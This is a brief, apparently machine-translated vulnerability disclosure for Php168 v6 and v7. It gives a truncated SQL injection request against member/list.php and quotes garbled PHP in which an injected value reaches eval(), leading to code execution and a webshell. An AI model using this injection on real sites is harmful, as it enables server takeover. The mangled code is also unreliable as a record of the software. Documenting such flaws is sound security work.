Php168 v6 ~ Some v7 scripts are not strictly filtered to obtain webshells.

Php168 v6 ~ Getshell security issues in v7

It is a little tasteless and requires the following conditions:
1. Website configuration: true or static file generation
2. Allow registered members

The testing code of v6 is provided. After submission, phpinfo () is executed. The v7 principle is the same, but the number of database fields is different.

Member/list. php? Step = 2 & Type = delete & aidDB [] =-1) % 20 union % 20 select %,

Vulnerability in www.2cto.com make_more_article_html function:

Function make_more_article_html ($ comebackurl = '/', $ type = '', $ aidDB = ''){
Global $ db, $ pre, $ webdb, $ webdb, $ showHtml_Type;
If ($ webdb [NewsMakeHtml]! = 1 | $ aidDB = '') // $ webdb [NewsMakeHtml] is static
{Return ;}
...
$ Query = $ db-> query ("select. *, B. bencandy_html, B. list_html, D. aid FROM {$ pre} article_db d left join {$ pre} article a on d. aid =. aid left join {$ pre} sort B ON. fid = B. fid where d. aid IN ($ string )");
While ($ rs = $ db-> fetch_array ($ query )){
...
$ Filename_ B = $ rs [bencandy_html];
...
Eval ("\ $ showurl = \" $ filename_ B \";");
...

The vulnerability function is called in \ member \ list. php:

If ($ step = 2 ){
...
If ($ Type = 'delete '){
Make_more_article_html ("$ FROMURL", "del_0", $ aidDB );